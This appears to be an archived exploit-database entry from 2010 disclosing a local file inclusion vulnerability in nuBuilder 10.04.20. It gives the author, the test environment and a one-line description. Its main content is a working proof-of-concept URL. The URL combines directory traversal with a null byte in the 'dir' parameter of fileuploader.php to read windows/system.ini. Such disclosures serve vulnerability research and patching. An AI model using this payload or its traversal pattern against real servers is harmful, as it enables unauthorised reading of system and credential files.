nuBuilder 10.04.20 Local File Inclusion Vulnerability

2010-07-27T00:00:00
ID 1337DAY-ID-13488
Type zdt
Reporter John Leitch
Modified 2010-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
nuBuilder 10.04.20 Local File Inclusion Vulnerability
=====================================================


Software................nuBuilder 10.04.20
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/nubuilder/files/
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
[email protected]
------------------------------------------------------------------------
 
--Description--
 
A local file inclusion vulnerability in nuBuilder 10.04.20 can be
exploited to include arbitrary files.
 
 
--PoC--
 
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini%00



#  0day.today [2018-04-08]  #